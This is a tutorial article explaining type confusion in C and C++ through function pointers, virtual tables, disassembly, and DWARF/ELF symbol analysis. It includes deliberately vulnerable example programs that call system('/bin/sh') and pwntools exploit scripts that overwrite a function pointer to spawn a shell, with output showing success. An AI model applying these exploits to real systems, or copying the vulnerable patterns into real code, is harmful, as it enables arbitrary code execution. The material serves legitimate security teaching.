What Is Type Confusion?
In high-level programming languages, a variable typically consists of three parts: a data type, a name, and a value. The name distinguishes one variable from another (in C, for example, two local variables in the same scope cannot share a name). The value is the data the variable stores, and the data type determines how that value is interpreted.
This interpretation is not fixed: many programming languages allow an explicit type conversion (a cast) that treats a variable as another data type.
When code treats a variable as a data type other than the one it actually holds, the result is type confusion. The severity of the threat varies, and the most serious case is confusion involving function variables.
Function Variables
In C, every function has an address, so a function can also be referred to through a pointer-type variable. Such a function variable is declared in the following form:
return_type (*variable_name)(parameter list)
Example:
typedef void (*test_func)(void);
What Is Polymorphism?
Structures are a well-known concept in C and are not elaborated on here. A structure is a collection of variables, and structures in the Linux kernel often include function variables among their members.
A function generally performs one specific behavior, whereas a function variable can be bound to any function with a matching signature. This freedom lets the Linux kernel exhibit different behaviors through the same function variable.
Function variables can be seen as a way to achieve polymorphism. But what is this polymorphism?
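As a rough illustration of binding one function variable to different functions, the sketch below uses Python's ctypes module to mimic a C structure that holds a function pointer. The structure device_ops, its fields, and the two callbacks are hypothetical names invented for this example; they are not taken from the kernel.

```python
import ctypes

# C equivalent: typedef int (*transform_fn)(int);
TRANSFORM_FN = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int)

class device_ops(ctypes.Structure):
    """Hypothetical structure: some data plus one function variable."""
    _fields_ = [
        ("name", ctypes.c_char * 16),
        ("transform", TRANSFORM_FN),
    ]

def twice(x):
    return x * 2

def negate(x):
    return -x

# Keep the wrapped callbacks alive for as long as the structure uses them.
twice_cb = TRANSFORM_FN(twice)
negate_cb = TRANSFORM_FN(negate)

dev = device_ops(b"demo", twice_cb)
results = [dev.transform(21)]      # call through the function variable

dev.transform = negate_cb          # rebind the same member to another function
results.append(dev.transform(21))  # same call site, different behavior

print(results)
```

The call site never changes; only the value stored in the function variable does, which is exactly the property that makes a corrupted function variable dangerous.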
Virtual Functions and Polymorphism
The concept of polymorphism originates from object-oriented programming. It means expressing different behaviors through the same interface, much as one power socket can supply many electrical appliances that serve different purposes.
Virtual functions are the key to implementing polymorphism in C++. They come in two kinds: ordinary virtual functions and pure virtual functions. An ordinary virtual function has an implementation in the base class, which subclasses may override. A pure virtual function needs no implementation in the base class, but subclasses must implement it. A base class with a pure virtual function cannot be instantiated and exists only as an abstract class.
Virtual Functions in C++
Compared to the implementation of polymorphism in C, virtual functions used to implement polymorphism in C++ are somewhat more complex. Below is an example for analysis.
The source code of the example program is shown below. The program creates a base class named my_test that defines a virtual function vtest1, a pure virtual function vtest2, and an ordinary member function test_func. The subclass testA overrides the virtual function vtest1 and implements the pure virtual function vtest2, and the main function calls all three.
In addition, each class has a constructor and a destructor (the member whose name begins with ~). Both share a characteristic: they declare no return type before the function name. The constructor is called when an object of the class is created, and the destructor is called when the object is destroyed. In the base class my_test, the destructor ~my_test is marked with the virtual keyword, which ensures that the subclass destructor also runs when the object is deleted through a base-class pointer.
#include <iostream>
using namespace std;
class my_test {
public:
    my_test() {
        cout << "enter my_test" << endl;
    }
    // Virtual, so deleting through a my_test* also runs the subclass destructor.
    virtual ~my_test() {
        cout << "leave my_test" << endl;
    }
    virtual void vtest1() {
        cout << "is " << __func__ << endl;
    }
    virtual void vtest2() = 0;  // pure virtual: subclasses must implement it
    void test_func();
};
void my_test::test_func(void) {
    cout << "enter " << __func__ << endl;
}
class testA: public my_test {
public:
    testA() {
        cout << "enter testA" << endl;
    }
    ~testA() {
        cout << "leave testA" << endl;
    }
    void vtest1() override {
        cout << "is [testA] " << __func__ << endl;
    }
    void vtest2(void) override {
        cout << "is [testA] " << __func__ << endl;
    }
};
int main(void)
{
    my_test *tmp;
    tmp = (my_test*)new testA();
    tmp->vtest1();
    tmp->vtest2();
    tmp->test_func();
    delete tmp;
}
The program’s output is as follows:
enter my_test
enter testA
is [testA] vtest1
is [testA] vtest2
enter test_func
leave testA
leave my_test
Exploring Strange Symbol Names
From the disassembly results, we can see many strange names. How did they become like this? Let's start with the plt section, which is called first!
Strange PLT Names
The plt section itself is not described in detail here, since it is resolved in the same way as in a C program. Instead, we focus on how libstdc++.so knows about these peculiar names.
plt section:
<_Znwm@plt>
<_ZdlPvm@plt>
Main function main:
call 401050 <_Znwm@plt>
call 401060 <_ZdlPvm@plt>
Checking the symbol information in libstdc++.so shows that this dynamic link library defines the strange names. We can confirm this by subtracting the library's runtime base address from each function's runtime address: the resulting offset matches the symbol's value in the ELF file.
Offset values in ELF file:
readelf -s /lib/x86_64-linux-gnu/libstdc++.so.6 | grep nwm
4817: 00000000000a9570 53 FUNC GLOBAL DEFAULT 13 _Znwm@@GLIBCXX_3.4
readelf -s /lib/x86_64-linux-gnu/libstdc++.so.6 | grep _ZdlPvm
1473: 00000000000a78e0 9 FUNC GLOBAL DEFAULT 13 _ZdlPvm@@CXXABI_1.3.9
Runtime addresses:
(gdb) info symbol 0x00007ffff7ca9570
operator new(unsigned long) in section .text of /lib/x86_64-linux-gnu/libstdc++.so.6
(gdb) info symbol 0x00007ffff7ca78e0
operator delete(void*, unsigned long) in section .text of /lib/x86_64-linux-gnu/libstdc++.so.6
Dynamic link library base address:
0x7ffff7c00000 0x7ffff7c99000 0x99000 0x0 r--p /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.30
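The comparison can be checked with a few lines of Python. This is only a sketch that reuses the numbers from the readelf, GDB, and memory-map listings above; the helper name runtime_offset is made up for the example.

```python
# Values copied from the listings above.
LIB_BASE = 0x7ffff7c00000  # runtime base address of libstdc++.so.6

symbols = {
    # mangled name: (symbol value from readelf, runtime address from gdb)
    "_Znwm": (0xA9570, 0x7FFFF7CA9570),
    "_ZdlPvm": (0xA78E0, 0x7FFFF7CA78E0),
}

def runtime_offset(runtime_addr, base=LIB_BASE):
    """Offset of a runtime address from the library's load base."""
    return runtime_addr - base

for name, (elf_value, runtime_addr) in symbols.items():
    offset = runtime_offset(runtime_addr)
    print(f"{name}: offset {offset:#x}, matches ELF value: {offset == elf_value}")
```

Both offsets agree with the readelf output, so the addresses reached through the plt entries do belong to the symbols defined in libstdc++.so.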
Strange New – Up
First, we can see that before <_Znwm@plt> is called to handle new, 0x8 is loaded into edi (the low 32 bits of rdi) as the first argument. What is this 0x8?
mov $0x8,%edi
call 401050 <_Znwm@plt>
mov %rax,%rbx
mov %rbx,%rdi
call 4013ea <_ZN5testAC1Ev>
Tracing the program shows that 0x8 is used by the new function when it actually runs. That new takes a single unsigned long parameter can be confirmed through GDB's symbol resolution or by analyzing the symbol information.
GDB display:
operator new(unsigned long)
DWARF display:
<1><24b3>: Abbrev Number: 13 (DW_TAG_subprogram)
<24b4> DW_AT_name : (indirect string, offset: 0xa4a): operator new
<24bb> DW_AT_linkage_name: (indirect string, offset: 0x5f4): _Znwm
<2><24c7>: Abbrev Number: 1 (DW_TAG_formal_parameter)
<24c8> DW_AT_type : <0x537>
<2><24cc>: Abbrev Number: 0
ELF display:
6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND _Znwm@GLIBCXX_3.4 (2)
Here, new receives 0x8 as the number of bytes to allocate: a testA object has no data members, so it occupies only 8 bytes, the size of a single pointer.
Introduction to Debugging Symbols
A brief note on debugging symbols is in order. Binary files are obscure and difficult to read, so toolchains provide debugging symbols that map binary information back to human-readable semantic information. Debugging symbols can be embedded in the binary file itself, as with ELF files, or stored in a separate file, as with the .pdb files that accompany PE files.
In Linux, there are ELF symbols and DWARF symbols. First, let’s look at DWARF symbols.
DWARF Symbols
In ELF files, sections named .debug_xxx contain DWARF information. Their presence can already be seen in the generated assembly files (.s); temporary files can be retained for viewing using GCC's -save-temps option. To view the DWARF information of a binary file in Linux, we can use readelf --debug-dump to dump all DWARF information.
There are many .debug_xxx sections in an ELF file, and the .debug_info section is the one we need to focus on.
The .debug_info section contains the core information of DWARF and stores it in a tree structure. The root node is the compile unit, and each .o file corresponds to one compile unit. The nodes below the compile unit record all the necessary symbol information.
The number in angle brackets at the start of each entry is its nesting level: <1> marks a top-level symbol, and deeper levels mark its children, so following the levels traverses all subordinate symbols. Below is an example. The <1> entry is a DW_TAG_subprogram, which means that the symbol is a function, and its DW_AT_name attribute shows that the function is named shell_get. The function node contains a child node, DW_TAG_formal_parameter, which represents a parameter received by the function. Its DW_AT_name attribute shows that the parameter is named msg, and its DW_AT_type attribute identifies the parameter's data type. Following the reference 0x74, we first find that the type is an 8-byte pointer; following 0x6f, we find that the pointed-to type is qualified by the const keyword; finally, at 0x68, we reach a DW_TAG_base_type named char. From this chain we can deduce the complete data type: const char*.
<0><c>: Abbrev Number: 55 (DW_TAG_compile_unit)
......
......
<1><1fa>: Abbrev Number: 23 (DW_TAG_subprogram)
<1fb> DW_AT_name : (indirect string, offset: 0): shell_get
......
<2><214>: Abbrev Number: 6 (DW_TAG_formal_parameter)
<215> DW_AT_name : msg
<219> DW_AT_decl_file : 1
<219> DW_AT_decl_line : 27
<21a> DW_AT_decl_column : 35
<21b> DW_AT_type : <0x74>
<21f> DW_AT_location : 2 byte block: 91 68 (DW_OP_fbreg: -24)
<2><222>: Abbrev Number: 0
......
<1><68>: Abbrev Number: 1 (DW_TAG_base_type)
<69> DW_AT_byte_size : 1
<6a> DW_AT_encoding : 6 (signed char)
<6b> DW_AT_name : (indirect string, offset: 0x5d): char
<1><6f>: Abbrev Number: 14 (DW_TAG_const_type)
<70> DW_AT_type : <0x68>
<1><74>: Abbrev Number: 2 (DW_TAG_pointer_type)
<75> DW_AT_byte_size : 8
<75> DW_AT_type : <0x6f>
......
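The walk through the type references can be expressed as a small recursive lookup. The sketch below hard-codes the three type entries from the dump above in a dictionary; the dictionary layout and the function type_name are assumptions made for illustration, and only the three tags seen here are handled.

```python
# Type entries copied from the dump above, keyed by their offset.
dies = {
    0x68: {"tag": "DW_TAG_base_type", "name": "char", "byte_size": 1},
    0x6F: {"tag": "DW_TAG_const_type", "type": 0x68},
    0x74: {"tag": "DW_TAG_pointer_type", "type": 0x6F, "byte_size": 8},
}

def type_name(offset):
    """Follow DW_AT_type references until a base type is reached."""
    die = dies[offset]
    tag = die["tag"]
    if tag == "DW_TAG_base_type":
        return die["name"]
    if tag == "DW_TAG_const_type":
        # Simplification: const is written as a prefix of the type it qualifies.
        return "const " + type_name(die["type"])
    if tag == "DW_TAG_pointer_type":
        return type_name(die["type"]) + "*"
    raise ValueError(f"unhandled tag {tag}")

# DW_AT_type of the msg parameter is <0x74>.
print(type_name(0x74))  # const char*
```

The result matches the declaration of the parameter in the C source shown later in this article, static void shell_get(const char* msg).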
ELF Symbols
ELF symbols refer to the contents of the .symtab section, and ELF symbol information is not as comprehensive as DWARF.
If there is no debugger like GDB or if the ELF file does not contain DWARF information, and we want to analyze information such as function parameters and local variables, we can only start from the disassembly results of the function!
Strange New – Down
Once the call to <_Znwm@plt> completes the new operation, new has returned the address of the newly allocated memory, which will later be stored in tmp. The program then passes this address as the argument to <_ZN5testAC1Ev>.
mov %rax,%rbx
movq $0x0,(%rbx)
mov %rbx,%rdi
call 4013b6 <_ZN5testAC1Ev>
Reading the disassembly of the _ZN5testAC1Ev function, we can see that it is the constructor of the testA class. It first calls the constructor of the base class my_test and then executes the logic of its own constructor.
From this, we can see that the compiler arranges the call to the base-class constructor at compile time.
_ZN5testAC1Ev
-> mov %rdi,-0x18(%rbp)
-> _ZN7my_testC1Ev
-> mov %rdi,-0x8(%rbp)
-> lea 0x2a9f(%rip),%rdx # 0x403d90
-> mov -0x8(%rbp),%rax
-> mov %rdx,(%rax)
-> lea 0x2956(%rip),%rdx # 0x403d60
-> mov -0x18(%rbp),%rax
-> mov %rdx,(%rax)
The instructions above are singled out because they perform operations that the source code of the constructors never specified.
The _ZN5testAC1Ev function first receives the object pointer (the value that main later stores in tmp) as its parameter and saves it at rbp-0x18, so that it is not lost if rdi is clobbered while _ZN7my_testC1Ev runs. After the parameter has been handled, the constructors of both my_test and testA contain the same three-instruction sequence, lea ; mov ; mov, which performs the same task in each. The first instruction, lea, loads into rdx the address of some data in the memory image of the ELF file; the second loads the saved object pointer into rax; the third stores the address from the first step into the first 8 bytes of the object.
[22] .data.rel.ro PROGBITS 0000000000403d50 00002d50
0000000000000088 0000000000000000 WA 0 0 8
Comparing the addresses with the section header shows that both 0x403d90 and 0x403d60 lie inside the .data.rel.ro section. What is this data used for?
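To make the two observations concrete, the following sketch models the 8-byte object as a bytearray and replays the two stores performed by the constructors, then checks both addresses against the section header shown above. The function names are hypothetical; the addresses and sizes are taken from the listings.

```python
import struct

# From the section header above: .data.rel.ro starts at 0x403d50, size 0x88.
DATA_REL_RO = (0x403D50, 0x88)
# Addresses loaded by the two lea instructions.
MY_TEST_DATA = 0x403D90
TESTA_DATA = 0x403D60

def in_section(addr, section=DATA_REL_RO):
    start, size = section
    return start <= addr < start + size

def store_qword(obj, value):
    """Model `mov %rdx,(%rax)`: write 8 little-endian bytes at offset 0."""
    struct.pack_into("<Q", obj, 0, value)

def load_qword(obj):
    return struct.unpack_from("<Q", obj, 0)[0]

def construct_testA():
    obj = bytearray(8)               # the 8 bytes returned by operator new
    history = []
    store_qword(obj, MY_TEST_DATA)   # performed inside my_test's constructor
    history.append(load_qword(obj))
    store_qword(obj, TESTA_DATA)     # performed inside testA's constructor
    history.append(load_qword(obj))
    return obj, history

obj, history = construct_testA()
print([hex(v) for v in history])
print(in_section(MY_TEST_DATA), in_section(TESTA_DATA))
```

The base-class value is written first and then overwritten, so once construction finishes the object's first 8 bytes hold the testA address.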
So You Are the Virtual Function Table!
Before calling the constructor of testA, the program first copies the pointer that will become tmp into rbx and then into rdi. This seems like a very redundant operation!
mov %rax,%rbx
mov %rbx,%rdi
call 4013ea <_ZN5testAC1Ev>
The copy is not wasted, though: rbx is a callee-saved register, so the pointer in it survives the constructor call. Reading further, we find that the program stores this pointer at rbp-0x18, which is the local variable tmp. For each virtual call it reloads the pointer and executes mov (%rax),%rax, which places the address stored by the constructor into rax. It then adds an offset of 0x10 or 0x18 to obtain a second address, loads the value saved at that address into rdx, and calls through rdx. The pointer at rbp-0x18 therefore serves both to locate the class data and to supply the first argument of the call.
mov %rbx,-0x18(%rbp)
vtest1:
mov -0x18(%rbp),%rax
mov (%rax),%rax
add $0x10,%rax
mov (%rax),%rdx
mov -0x18(%rbp),%rax
mov %rax,%rdi
call *%rdx
vtest2:
mov -0x18(%rbp),%rax
mov (%rax),%rax
add $0x18,%rax
mov (%rax),%rdx
mov -0x18(%rbp),%rax
mov %rax,%rdi
call *%rdx
The first call reads its target from 0x403d60 + 0x10 = 0x403d70, the slot in the .data.rel.ro section that holds the address of the vtest1 implementation. The second call reads its target from 0x403d60 + 0x18 = 0x403d78, the slot that holds the address of the vtest2 implementation.
Contents of section .data.rel.ro:
403d50 00000000 00000000 b03d4000 00000000 .........=@.....
403d60 5e144000 00000000 b2144000 00000000 ^.@.......@.....
403d70 de144000 00000000 2e154000 00000000 ..@.......@.....
403d80 00000000 00000000 c83d4000 00000000 .........=@.....
403d90 00000000 00000000 00000000 00000000 ................
403da0 9a134000 00000000 00000000 00000000 ..@.............
403db0 00000000 00000000 67204000 00000000 ........g @.....
403dc0 c83d4000 00000000 00000000 00000000 .=@.............
403dd0 70204000 00000000 p @.....
The values stored in these two slots are 0x4014de and 0x40152e, and the disassembly confirms that they are the addresses of the vtest1 and vtest2 implementations.
00000000004014de <_ZN5testA6vtest1Ev>
000000000040152e <_ZN5testA6vtest2Ev>
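The symbol names in these listings are encoded with the Itanium C++ ABI name mangling scheme that GCC uses on Linux. The sketch below decodes only the simple nested form that appears in this article (_ZN, length-prefixed identifiers, an optional constructor or destructor code, E, and a parameter list). The function decode_nested is a hypothetical helper written for this example, not a replacement for a real demangler such as c++filt.

```python
import re

# Constructor and destructor codes defined by the Itanium C++ ABI.
SPECIAL = {
    "C1": "complete object constructor",
    "C2": "base object constructor",
    "D0": "deleting destructor",
    "D1": "complete object destructor",
    "D2": "base object destructor",
}

def decode_nested(mangled):
    """Decode names of the form _ZN<len><id>...[C1|D0|...]E<params>."""
    if not mangled.startswith("_ZN"):
        raise ValueError("only nested names (_ZN...E) are handled")
    pos, parts, kind = 3, [], "function"
    while mangled[pos] != "E":
        m = re.match(r"\d+", mangled[pos:])
        if m:  # <length><identifier>
            length = int(m.group())
            start = pos + m.end()
            parts.append(mangled[start:start + length])
            pos = start + length
        else:  # two-character constructor/destructor code
            code = mangled[pos:pos + 2]
            kind = SPECIAL[code]
            parts.append(("~" if code[0] == "D" else "") + parts[-1])
            pos += 2
    encoded_params = mangled[pos + 1:]
    params = "" if encoded_params == "v" else encoded_params  # "v" means no parameters
    return "::".join(parts) + f"({params})", kind

for name in ("_ZN5testAC1Ev", "_ZN7my_testC1Ev",
             "_ZN5testA6vtest1Ev", "_ZN5testA6vtest2Ev"):
    print(name, "->", decode_nested(name))
```

Read this way, _ZN5testA6vtest1Ev is testA::vtest1() and _ZN5testAC1Ev is the testA constructor, which agrees with what the disassembly showed.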
At this point, we understand that creating an object of a class calls its constructor, and that the subclass's constructor calls the base class's constructor. Each constructor does two things: it stores the address of the class data into the object, and it executes the behavior written in the source code.
At compile time, the compiler generates this data from the class definitions and places it in the .data.rel.ro section. At run time, the program stores the address of the class data in the newly allocated object, and each virtual call fetches the function's address from the memory image of the ELF file at a compiler-chosen offset from that address.
Because the addresses of the virtual functions are stored contiguously, this data is called the virtual function table.
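The lookup performed by the call sequence can be replayed offline against the dump. The sketch below is a minimal model, assuming the two dump rows and the symbol addresses quoted in this article; read_qword and virtual_call_target are names invented for the example.

```python
import struct

# Two rows of the .data.rel.ro dump (row address -> raw bytes).
dump = {
    0x403D60: bytes.fromhex("5e144000 00000000 b2144000 00000000"),
    0x403D70: bytes.fromhex("de144000 00000000 2e154000 00000000"),
}

# Function addresses taken from the disassembly listings in this article.
functions = {
    0x40145E: "_ZN5testAD1Ev",
    0x4014B2: "_ZN5testAD0Ev",
    0x4014DE: "_ZN5testA6vtest1Ev",
    0x40152E: "_ZN5testA6vtest2Ev",
}

def read_qword(addr):
    """Read a little-endian 64-bit value from the dumped rows."""
    for base, row in dump.items():
        if base <= addr and addr + 8 <= base + len(row):
            return struct.unpack_from("<Q", row, addr - base)[0]
    raise KeyError(hex(addr))

def virtual_call_target(table_addr, slot_offset):
    # Models: mov (%rax),%rax ; add $slot_offset,%rax ; mov (%rax),%rdx
    return read_qword(table_addr + slot_offset)

TABLE = 0x403D60  # value the testA constructor stored in the object
for offset in (0x0, 0x8, 0x10, 0x18):
    target = virtual_call_target(TABLE, offset)
    print(f"slot +{offset:#x}: {target:#x} {functions[target]}")
```

Slots 0x10 and 0x18 resolve to the two virtual functions, while the first two slots hold the destructor entries.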
Destructor Execution
To carry out the delete operation, the program also performs an indirect call *%rdx. It first checks whether the object pointer is null; if it is, the call is skipped. Otherwise, it fetches the address stored at offset 0x8 of the class data and calls it.
mov -0x18(%rbp),%rax
test %rax,%rax
je 40124b <main+0x76>
mov (%rax),%rdx
add $0x8,%rdx
mov (%rdx),%rdx
mov %rax,%rdi
call *%rdx
In the .data.rel.ro section, we can see that the address at offset 0x8 is 0x4014b2.
403d60 5e144000 00000000 b2144000 00000000
The address 0x4014b2 corresponds to the function _ZN5testAD0Ev, and this function will also call the function _ZN5testAD1Ev. By analyzing these two functions, we can find that they are the destructors.
4014b2 <_ZN5testAD0Ev>
-> call 40145e <_ZN5testAD1Ev>
The Seriousness of Type Confusion
The difference between C and C++ in implementing virtual functions is that in C the programmer defines the table of function variables by hand, while in C++ the compiler generates it automatically. Either way, function variables are highly flexible. If data is misinterpreted as a function variable, whoever controls that data controls where the program jumps, which can lead to serious issues.
Example Explanation
Below, examples in both C and C++ will be provided to demonstrate the type confusion caused by virtual functions.
C Language Version
Below is the source code for the C language program.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#define MAX_DATA_LEN 0x100
static void msg_print(const char* msg);
/* Layout A: buffer first, function variable last. */
typedef struct _your_msg {
    char msg_info[MAX_DATA_LEN];
    void (*msg_info_print)(const char*);
} your_msg;
/* Layout B: same members, opposite order. */
typedef struct _my_msg {
    void (*msg_info_print)(const char*);
    char msg_info[MAX_DATA_LEN];
} my_msg;
your_msg um = {
    .msg_info = "is your\n\0",
    .msg_info_print = msg_print,
};
static void shell_get(const char* msg)
{
    system(msg);
}
static void msg_print(const char* msg)
{
    printf("%s", msg);
}
static void vuln(void* ptr)
{
    /* Type confusion: ptr really points to a your_msg. */
    my_msg *mm = (my_msg*)ptr;
    mm->msg_info_print(mm->msg_info);
}
int main(void)
{
    void *tmp;
    tmp = &um;
    um.msg_info_print = msg_print;
    um.msg_info_print(um.msg_info);
    printf("please input something\n");
    /* User-controlled bytes land at the start of um. */
    read(STDIN_FILENO, um.msg_info, MAX_DATA_LEN);
    vuln(tmp);
}
From the source code, we can see that the main function initially describes um using the your_msg structure. The buffer member msg_info of um is filled from standard input, but once um is passed to the vuln function, it is described by the my_msg structure instead. Although your_msg and my_msg have the same members, their layouts differ: the function variable msg_info_print of my_msg overlaps the first 8 bytes of your_msg's msg_info (msg_info through msg_info + 0x8), and the msg_info of my_msg begins at your_msg's msg_info + 0x8. Since we control those bytes, we control both the function that vuln calls and the argument it receives.
-------------------      -------------------
|    your_msg     |      |     my_msg      |
-------------------      -------------------
| msg_info[0x100] |      | msg_info_print  |
-------------------      -------------------
| msg_info_print  |      | msg_info[0x100] |
-------------------      -------------------
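The overlap can be reproduced without running the vulnerable program. The sketch below mirrors both structures with Python's ctypes module and views the same bytes through each layout. It assumes a 64-bit little-endian host, and FAKE_SHELL_GET is a made-up address used purely for illustration.

```python
import ctypes
import struct

MAX_DATA_LEN = 0x100

class your_msg(ctypes.Structure):
    _fields_ = [("msg_info", ctypes.c_char * MAX_DATA_LEN),
                ("msg_info_print", ctypes.c_void_p)]

class my_msg(ctypes.Structure):
    _fields_ = [("msg_info_print", ctypes.c_void_p),
                ("msg_info", ctypes.c_char * MAX_DATA_LEN)]

FAKE_SHELL_GET = 0x401196  # hypothetical address, not taken from a real binary

um = your_msg()
payload = struct.pack("<Q", FAKE_SHELL_GET) + b"/bin/sh\0"

# Models read(STDIN_FILENO, um.msg_info, ...): msg_info sits at offset 0 of um.
ctypes.memmove(ctypes.addressof(um), payload, len(payload))

# Models the cast in vuln(): same bytes, interpreted with the other layout.
mm = my_msg.from_buffer(um)

print("your_msg.msg_info_print offset:", hex(your_msg.msg_info_print.offset))
print("my_msg.msg_info_print offset:  ", hex(my_msg.msg_info_print.offset))
print("confused function pointer:", hex(mm.msg_info_print))
print("confused argument:", mm.msg_info)
```

Seen through my_msg, the first 8 input bytes become the function variable and the bytes that follow become its argument.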
Constructing the Exploit
Based on the analysis above, we can construct the following exploit.
import pwn
pwn.context.clear()
pwn.context.update(
    arch = 'amd64', os = 'linux',
)
def hack_by_c_example():
    # The first 8 bytes of msg_info are read as my_msg.msg_info_print in vuln();
    # the bytes after them are read as my_msg.msg_info, the argument of the call.
    payload = pwn.p64(target_info['elf_info'].sym['shell_get'])
    payload += b'/bin/sh\0'
    return payload
target_info = {
    'exec_path': './type_confusion_example4c',
    'elf_info': None,
    'buf_len': 0x100,
    'addr_len': 0x8,
    'shell_get_func_addr': 0x0,
}
target_info['elf_info'] = pwn.ELF(target_info['exec_path'])
conn = pwn.process(target_info['exec_path'])
payload = hack_by_c_example()
conn.sendafter(b'please input something\n', payload)
conn.interactive()
Successful PWN
After running the exploit, we successfully obtain a shell.
[*] '/home/astaroth/Labs/PWN/UserMode/TypeConfusion/type_confusion_example4c'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process './type_confusion_example4c': pid 42818
[*] Switching to interactive mode
$ id
uid=1000(astaroth) gid=1000(astaroth) groups=1000(astaroth)
$ exit
C++ Language Version
Below is the source code for the C++ program.
#include <iostream>
#include <cstring>
#include <cstdlib>
using namespace std;
#define MAX_DATA_LEN 0x100
static void vuln(void);
class offline {
public:
    virtual void offline_end() = 0;
};
class offline_a: public offline {
public:
    offline_a() {
        strncpy(desc, "hello c++\0", MAX_DATA_LEN);
    }
    virtual void offline_end() {
        cout << desc << endl;
    }
    char desc[MAX_DATA_LEN];    // desc is a buffer here
};
class offline_b: public offline {
public:
    virtual void offline_end() {
        desc();
    }
    void (*desc)(void);         // desc is a function variable here
};
static void vuln(void) {
    system("/bin/sh");
}
int main(void)
{
    string buf;
    offline* tmpB;
    offline_a* apt;
    tmpB = new offline_b();
    // Type confusion: the object is an offline_b, but apt views it as an offline_a.
    apt = static_cast<offline_a*>(tmpB);
    cout << "please input something" << endl;
    cin >> buf;
    strncpy(apt->desc, buf.c_str(), MAX_DATA_LEN);
    apt->offline_end();
}
From the above, we can see that offline_a and offline_b have different implementations of the virtual function offline_end. The key is that one treats desc as a buffer variable, while the other treats desc as a function variable. In the main function, an offline_b object is created first, and the pointer to it is then cast to offline_a*. Through that pointer, desc is treated as a buffer variable. The cast does not change the object itself, however: its virtual function table still belongs to offline_b, so when offline_end is triggered, offline_b's implementation runs and treats the same bytes as a function variable. Since the program allows us to write data into desc while treating it as a buffer variable, the execution flow of offline_end becomes controllable by us.
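The same effect can be modeled with ctypes. The sketch below assumes the usual x86-64 layout in which an object starts with its 8-byte virtual table pointer followed by its members, and a little-endian host. FAKE_VTABLE and FAKE_VULN are invented addresses, and strncpy_like is a hypothetical stand-in for strncpy.

```python
import ctypes
import struct

MAX_DATA_LEN = 0x100

class offline_a(ctypes.Structure):   # [vptr][char desc[0x100]]
    _fields_ = [("vptr", ctypes.c_void_p),
                ("desc", ctypes.c_char * MAX_DATA_LEN)]

class offline_b(ctypes.Structure):   # [vptr][void (*desc)(void)]
    _fields_ = [("vptr", ctypes.c_void_p),
                ("desc", ctypes.c_void_p)]

FAKE_VTABLE = 0x403D00  # hypothetical: stands for offline_b's virtual table
FAKE_VULN = 0x401256    # hypothetical: stands for the address of vuln()

# Backing store large enough for both views (the real object is smaller,
# which is why the strncpy in main() also overflows the heap chunk).
heap = bytearray(ctypes.sizeof(offline_a))
real = offline_b.from_buffer(heap)        # what the object actually is
real.vptr = FAKE_VTABLE
confused = offline_a.from_buffer(heap)    # what static_cast pretends it is

def strncpy_like(view, data):
    """Copy up to the first NUL byte, as strncpy would; the rest stays zero."""
    view.desc = data.split(b"\0")[0]

strncpy_like(confused, struct.pack("<Q", FAKE_VULN))

print("desc offsets:", offline_a.desc.offset, offline_b.desc.offset)
print("vptr unchanged:", hex(real.vptr))
print("function variable now:", hex(real.desc))
```

Both classes place desc at offset 8, so writing the buffer through the offline_a view rewrites the function variable that offline_b::offline_end later calls, while the virtual table pointer keeps selecting offline_b's implementation.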
Constructing the Exploit
Based on the analysis above, we can construct the following exploit.
import pwn
pwn.context.clear()
pwn.context.update(
    arch = 'amd64', os = 'linux',
)
def hack_by_cxx_example():
    # These bytes land in desc, which offline_b::offline_end calls as a function.
    payload = pwn.p64(target_info['elf_info'].sym['_ZL4vulnv'])
    return payload
target_info = {
    'exec_path': './type_confusion_example4cpp',
    'elf_info': None,
    'buf_len': 0x100,
    'addr_len': 0x8,
    'shell_get_func_addr': 0x0,
}
target_info['elf_info'] = pwn.ELF(target_info['exec_path'])
conn = pwn.process(target_info['exec_path'])
payload = hack_by_cxx_example()
# cin >> buf keeps reading until whitespace, so end the input with a newline.
conn.sendlineafter(b'please input something\n', payload)
conn.interactive()
Successful PWN
After running the exploit, we successfully obtain a shell.